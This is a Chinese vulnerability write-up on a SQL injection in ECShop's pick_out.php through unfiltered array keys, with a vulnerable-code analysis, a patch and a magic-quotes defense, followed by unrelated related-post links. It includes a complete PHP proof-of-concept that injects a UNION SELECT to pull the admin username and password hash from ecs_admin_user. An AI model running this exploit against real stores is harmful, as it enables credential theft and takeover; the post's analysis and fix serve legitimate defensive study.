catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出key键注入

Relevant Link:

http://bbs.ecshop.com/thread-150545-1-1.html

2. 漏洞触发条件

. /pick_out.php漏洞未修复

. magic_quotes_gpc = Off

0x1: POC

#!/usr/bin/php

复制代码

<?php

    //本程序只作技术交流,请不要用做非法用途!!

    print_r('

    +---------------------------------------------------------------------------+

    ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit

    dork: "owered by ECShop"

    +---------------------------------------------------------------------------+

    ');

    /**

    * works with magic_quotes_gpc = Off

    */

    if ($argc < )

    {

        print_r('

        +---------------------------------------------------------------------------+

        Usage: php '.$argv[0].' host path

        host:      target server (ip/hostname)

        path:      path to ecshop

        Example:

        php '.$argv[0].' localhost /ecshop/

        +---------------------------------------------------------------------------+

        ');

        exit;

    }

    error_reporting();

    ini_set('max_execution_time', );

    $host = $argv[];

    $path = $argv[];

    $resp = send();

    preg_match('#IN\s\(([\S]+)[a-z0-9]{32})\)#', $resp, $hash);

    if ($hash)

    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");

    else

    exit("Exploit Failed!\n");

    function send()

    {

        global $host, $path;

        $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';

        $data = "GET ".$path."pick_out.php?".$cmd."  HTTP/1.1\r\n";

        $data .= "Host: $host\r\n";

        $data .= "Connection: Close\r\n\r\n";

        $fp = fsockopen($host, );

        fputs($fp, $data);

        $resp = '';

        while ($fp && !feof($fp))

            $resp .= fread($fp, );

        return $resp;

    }

?>

3. 漏洞影响范围
4. 漏洞代码分析

/pick_out.php

..

/* 处理属性,获取满足属性的goods_id */

if (!empty($_GET['attr']))

{

    $attr_table = '';

    $attr_where = '';

    $attr_url   = '';

    $i = ;

    $goods_result = '';

    foreach ($_GET['attr'] AS $key => $value)

    {

        $attr_url .= '&attr[' . $key . ']=' . $value;

        $attr_picks[] = $key;

        if ($i > )

        {

            if (empty($goods_result))

            {

                break;

            }

            // 利用key进行注射

            $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attr_value='$value'");

        }

        else

        {

            $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE attr_id='$key' AND attr_value='$value'");

        }

        $i++;

    }

    ..

5. 防御方法

/pick_out.php

define('IN_ECS', true);

require(dirname(__FILE__) . '/includes/init.php');

$condition = array();

$picks = array();

$cat_id = !empty($_GET['cat_id']) ? intval($_GET['cat_id']) : ;

if (!empty($_GET['attr']))

{

    //对输入数组进行键值(key、value)规范化处理

    foreach($_GET['attr'] as $key => $value)

    {

    /* */

        if (!is_numeric($key))

        {

            unset($_GET['attr'][$key]);

            continue;

        }

        $key = intval($key);

        $_GET['attr'][$key] = htmlspecialchars($value);

    /* */

    $attr_url .= '&attr[' . $key . ']=' . $value;

    ...

    }

}

Relevant Link:

http://bbs.ecshop.com/thread-86922-1-1.html

6. 攻防思考

GPC自动注册是PHP提供的原生机制,很多CMS为了保证"无视用户自身设置",在全局入口代码中采用了"自动模拟GPC注册"的机制,类似于

/*

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

    foreach($$_request as $_k => $_v)

        ${$_k} = $_v;

}

*/

但是,在进行模拟GPC本地变量注册的时候,一定要保持安全性的一致性,即要同时模拟执行"magic_quotes_gpc = On"机制,即需要对传入数据的进行[key:value]转义过滤,例如

function _RunMagicQuotes(&$svar)

{

    if(!get_magic_quotes_gpc())

    {

        if( is_array($svar) )

        {

            foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);

        }

        else

        {

            $svar = addslashes($svar);

        }

    }

    return $svar;

}

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

    foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);

}

Copyright (c) 2015 LittleHann All rights reserved

ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding的更多相关文章

  1. ecshop /search.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...

  2. ecshop /flow.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏 ...

  3. ecshop /goods.php SQL Injection Vul

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: poc http://localhost ...

  4. ecshop /category.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://sebug.net/vuld ...

  5. ecshop /api/client/api.php、/api/client/includes/lib_api.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECShop存在一个盲注漏洞,问题存在于/api/client/api. ...

  6. ecshop /includes/modules/payment/alipay.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/ ...

  7. dedecms /include/uploadsafe.inc.php SQL Injection Via Local Variable Overriding Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 . dedecms原生提供一个"本地变量注册"的模拟 ...

  8. discuz /faq.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 . 通过获取管理员密码 . 对管理员密码进行破解.通过在cmd5.com ...

  9. dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 . php magic_quotes_gpc= ...

随机推荐

  1. C#以post方式调用struts rest-plugin service的问题

    struts2: 玩转 rest-plugin一文中,学习了用struts2开发restful service的方法,发现用c#以post方式调用时各种报错,但java.ajax,包括firefox ...

  2. swift调用oc语言文件,第三方库文件或者自己创建的oc文件——简书作者

    Swift是怎样调用OC的第三方库的呢?请看下面详情: 情况一: 1.首先打开Xcode,iOS->Application->Single View Application, 选Next. ...

  3. ajax请求加载Loading或错误提示

    <div id="loadingDiv" style="color:#f39800;">Loading...</div> <scr ...

  4. nios II--实验6——串口软件部分

    软件开发 首先,在硬件工程文件夹里面新建一个software的文件夹用于放置软件部分:打开toolsàNios II 11.0 Software Build Tools for Eclipse,需要进 ...

  5. Socket网络编程--FTP客户端

    Socket网络编程--FTP客户端(1)(Windows) 已经好久没有写过博客进行分享了.具体原因,在以后说. 这几天在了解FTP协议,准备任务是写一个FTP客户端程序.直接上干货了. 0.了解F ...

  6. MATLAB中的set函数

    1.MATLAB给每种对象的每一个属性规定了一个名字,称为属性名,而属性名的取值成为属性值.例如,LineStyle是曲线对象的一个属性名,它的值决定着线型,取值可以是'-' .':'.'-.'.'- ...

  7. vi实战记录

    vi编辑器在Unix和Linux中比较早期的,Vim是vi的扩展集,是对vi的加强. 服务器最小化,默认集成vi编辑器!了解vi常用命令,工作起来颇有-洪荒之力!!! 01.关于退出 :wq!  -- ...

  8. Spring学习进阶(二)Spring IoC

    在使用Spring所提供的各种丰富而神奇的功能之前,必须在Spring IoC容器中装配好Bean,并建立Bean与Bean之间的关联关系.控制反转(Inverser of Control ioc)是 ...

  9. 68 id -显示用户的id

    Linux id命令用于显示用户的ID,以及所属群组的ID. id会显示用户以及所属群组的实际与有效ID.若两个ID相同,则仅显示实际ID.若仅指定用户名称,则显示目前用户的ID. 语法 id [-g ...

  10. springMvc接受日期类型参数处理

    这个问题,也即是springMvc如何进行参数类型的转换 以把client传过来一个String类型,转换为日期类型为例: 1.controller /** * 接收日期类型参数 * 注意: * sp ...